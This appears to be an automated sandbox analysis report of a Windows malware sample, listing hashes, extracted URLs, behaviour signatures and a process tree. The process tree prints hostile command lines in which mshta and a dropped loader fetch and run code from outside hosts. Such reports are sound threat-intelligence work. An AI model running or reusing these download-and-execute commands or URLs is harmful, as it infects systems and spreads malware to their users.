Analysis
-
max time kernel
122s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
01-12-2022 21:51
General
-
Target
8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe
-
Size
31KB
-
MD5
5f8ea64b83d41b4bcea80bf32ae63d12
-
SHA1
83170d02b320edb1515dca471285ede69b21f4a1
-
SHA256
8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3
-
SHA512
90a88bf5f1d679b1ba5d9513561ea9d0b04340fd1aa6d768126d47e774d3533c473fcdc34f0018213c7fa5985d720ff02a1ce48947c734680871357f54153dd7
-
SSDEEP
768:5LYTkV5ms+JsN9TEzmrB12o0Of6GGkll1hh:lVksus7TESr72o0Oip+l1j
Malware Config
Extracted
http://crusade-affiliates.com/install.php?id=3c3d01f7ff6560e1f038e07d052d60d4
Extracted
http://urodinam.net/dfgsdfsdf.php
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 1 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 38 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe"C:\Users\Admin\AppData\Local\Temp\8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://crusade-affiliates.com/install.php?id=3c3d01f7ff6560e1f038e07d052d60d42⤵
- Modifies Internet Explorer settings
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://urodinam.net/dfgsdfsdf.php2⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpp.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\load32.exeC:\Users\Admin\AppData\Local\Temp\load32.exe http://0ni9o1s3feu60.cn/u4.exe C:\Users\Admin\AppData\Local\Temp\safety.exe3⤵
- Executes dropped EXE
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1916 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1916 CREDAT:472068 /prefetch:22⤵
- Modifies Internet Explorer settings
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5af40555f69da106abd8544c015d6616c
SHA1dab2bbe6bdfad2d659a54f074985b9c47fe082b8
SHA2565471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b
SHA512d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb
-
Filesize
4KB
MD5af40555f69da106abd8544c015d6616c
SHA1dab2bbe6bdfad2d659a54f074985b9c47fe082b8
SHA2565471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b
SHA512d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb
-
Filesize
530B
MD5f77fb91e50bcc2898a78ef1462436ac4
SHA1ea8be4243028d2a89043a5b64c1dd07460da6a9c
SHA2567f3c2b73078001c6bfbdfa61d8d1f62822bae52dcd2726def766751bdc997d77
SHA5125dfe1f934a015d4a1bda01530e6fe2d986a3fcbc5c1b709ca1fa76fb9386311cf318bf85def9364eda0e53ca241c155c057c9c8759b3bb49f272c81f4416ab78
-
Filesize
4KB
MD5af40555f69da106abd8544c015d6616c
SHA1dab2bbe6bdfad2d659a54f074985b9c47fe082b8
SHA2565471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b
SHA512d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb
-
Filesize
4KB
MD5af40555f69da106abd8544c015d6616c
SHA1dab2bbe6bdfad2d659a54f074985b9c47fe082b8
SHA2565471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b
SHA512d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb
-
Filesize
8KB
-
Filesize
96KB
-
Filesize
96KB